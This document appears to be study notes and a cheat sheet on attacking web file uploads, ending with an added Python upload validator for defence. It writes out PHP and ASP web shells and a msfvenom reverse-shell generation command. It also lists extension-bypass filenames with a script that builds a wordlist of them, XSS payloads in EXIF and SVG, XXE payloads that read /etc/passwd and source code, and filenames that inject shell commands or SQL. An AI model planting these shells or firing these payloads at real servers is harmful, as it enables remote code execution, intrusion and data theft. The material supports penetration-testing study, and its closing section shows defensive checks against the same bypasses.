Web Shell | Description |
---|---|
`<?php file_get_contents('/etc/passwd'); ?>` | Basic PHP File Read |
`<?php system('hostname'); ?>` | Basic PHP Command Execution |
`<?php system($_REQUEST['cmd']); ?>` | Basic PHP Web Shell |
`<% eval request('cmd') %>` | Basic ASP Web Shell |
`msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php` | Generate PHP reverse shell |
PHP Web Shell | PHP Web Shell |
PHP Reverse Shell | PHP Reverse Shell |
Web/Reverse Shells | List of Web Shells and Reverse Shells |
Extension discovery list: https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-extensions.txt
Command | Description |
---|---|
Client-Side Bypass | |
`[CTRL+SHIFT+C]` | Toggle Page Inspector |
Blacklist Bypass | |
`shell.phtml` | Uncommon Extension |
`shell.pHp` | Case Manipulation |
PHP Extensions | List of PHP Extensions |
ASP Extensions | List of ASP Extensions |
Web Extensions | List of Web Extensions |
Whitelist Bypass | |
`shell.jpg.php` | Double Extension |
`shell.php.jpg` | Reverse Double Extension |
`%20`, `%0a`, `%00`, `%0d0a`, `/`, `.\`, `.`, `…` | Character Injection - Before/After Extension |
Content/Type Bypass | |
Web Content-Types | List of Web Content-Types |
Content-Types | List of All Content-Types |
File Signatures | List of File Signatures/Magic Bytes |
```bash
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do
    for ext in '.php' '.phps'; do
        echo "shell$char$ext.jpg" >> wordlist.txt
        echo "shell$ext$char.jpg" >> wordlist.txt
        echo "shell.jpg$char$ext" >> wordlist.txt
        echo "shell.jpg$ext$char" >> wordlist.txt
    done
done
```
Limited File Uploads

Potential Attack | File Types |
---|---|
XSS | HTML, JS, SVG, GIF (see [[XSS]]) |
XXE/SSRF | XML, SVG, PDF, PPT, DOC |
DoS | ZIP, JPG, PNG |

Another example of XSS attacks is web applications that display an image's metadata after its upload. For such web applications, we can include an XSS payload in one of the metadata parameters that accept raw text, like the `Comment` or `Artist` parameters, as follows:

```
exiftool -Comment=' "><img src=1 onerror=alert(window.origin)>' HTB.jpg
exiftool HTB.jpg
...SNIP...
Comment : "><img src=1 onerror=alert(window.origin)>
```
We can see that the `Comment` parameter was updated to our XSS payload. When the image's metadata is displayed, the XSS payload should be triggered, and the JavaScript code will be executed to carry out the XSS attack. Furthermore, if we change the image's MIME type to `text/html`, some web applications may show it as an HTML document instead of an image, in which case the XSS payload would be triggered even if the metadata wasn't directly displayed.
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
    <rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
    <script type="text/javascript">alert(window.origin);</script>
</svg>
```

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>
```

Once the above SVG image is uploaded and viewed, the XML document would get processed, and we should get the contents of `/etc/passwd` printed on the page or shown in the page source. Similarly, if the web application allows the upload of XML documents, then the same payload can carry the same attack when the XML data is displayed on the web application.
Read files/Code:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>
```
Using XML data is not unique to SVG images, as it is also utilized by many types of documents, like PDF, Word documents, and PowerPoint documents, among many others. All of these documents include XML data within them to specify their format and structure. Suppose a web application used a document viewer that is vulnerable to XXE and allowed uploading any of these documents. In that case, we may also modify their XML data to include the malicious XXE elements, and we would be able to carry out a blind XXE attack on the back-end web server.
For example, if we name a file `file$(whoami).jpg` or ``file`whoami`.jpg`` or `file.jpg||whoami`, and then the web application attempts to move the uploaded file with an OS command (e.g. `mv file /tmp`), then our file name would inject the `whoami` command, which would get executed, leading to remote code execution. You may refer to the Command Injections module for more information. See [[Command Injections]]

We may also inject an SQL query in the file name (e.g. `file';select+sleep(5);--.jpg`), which may lead to an SQL injection if the file name is insecurely used in an SQL query.
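As an added defensive example that is not part of these notes, the checks an upload handler needs against the bypasses listed on this page: only the last extension counts and is compared case-insensitively against a whitelist (defeats `shell.pHp`, `shell.phtml`, `shell.jpg.php`), the filename is restricted to safe characters (defeats `%00`/`%0a`/`/` injection and the `$(whoami)`, `||whoami` and `';select` names), the content must carry the magic bytes of the claimed type (defeats `shell.php.jpg` containing PHP), the file is stored under a random name, and SVG/XML or metadata text is scanned for script, event handlers and external entities. The function and pattern names, the whitelist and the constructed test inputs are my own assumptions, not a specific framework's API.

```python
import os
import re
import secrets

# Only the image types the application actually needs; php, phtml, phps never match.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Magic bytes the uploaded content must start with for the extension it claims.
MAGIC_BYTES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Filename character whitelist (assumed policy): rejects %, null/newline bytes, / and \,
# $( ), backticks, quotes, | and ;, and requires a name plus at least one extension.
_SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]+(\.[A-Za-z0-9_-]+)+$")

# Markup that turns SVG/XML content or an EXIF comment into an XSS/XXE payload
# (constructed, non-exhaustive; DOCTYPE is rejected outright as the XXE carrier).
_ACTIVE_MARKUP = re.compile(rb"<script|<!ENTITY|<!DOCTYPE|\bon[a-z]+\s*=", re.IGNORECASE)


def validate_upload(filename: str, content: bytes):
    """Return (accepted, reason, stored_name).

    Only the LAST extension is considered, case-folded, against the whitelist, and
    the content must carry that type's magic bytes. The file is stored under a
    random name, so the client-supplied name never reaches the filesystem, a shell
    command or an SQL query.
    """
    base = os.path.basename(filename.replace("\\", "/"))  # strip any path component
    if not _SAFE_NAME.match(base):
        return False, "filename has disallowed characters or no extension", None
    ext = base.rsplit(".", 1)[1].lower()  # shell.jpg.pHp -> php, shell.php.jpg -> jpg
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension .{ext} is not allowed", None
    if not content.startswith(MAGIC_BYTES[ext]):  # tuple: any listed signature
        return False, f"content does not look like a .{ext} file", None
    return True, "ok", f"{secrets.token_hex(16)}.{ext}"


def contains_active_markup(content: bytes) -> bool:
    """Detect script tags, event handlers or DTD/entity declarations in SVG, XML
    or metadata text before it is rendered or parsed."""
    return _ACTIVE_MARKUP.search(content) is not None
```

The magic-byte check does not stop a polyglot (valid JPEG header with PHP appended); the random stored name, the single whitelisted extension, and serving uploads from a location the web server never executes are what neutralize that case.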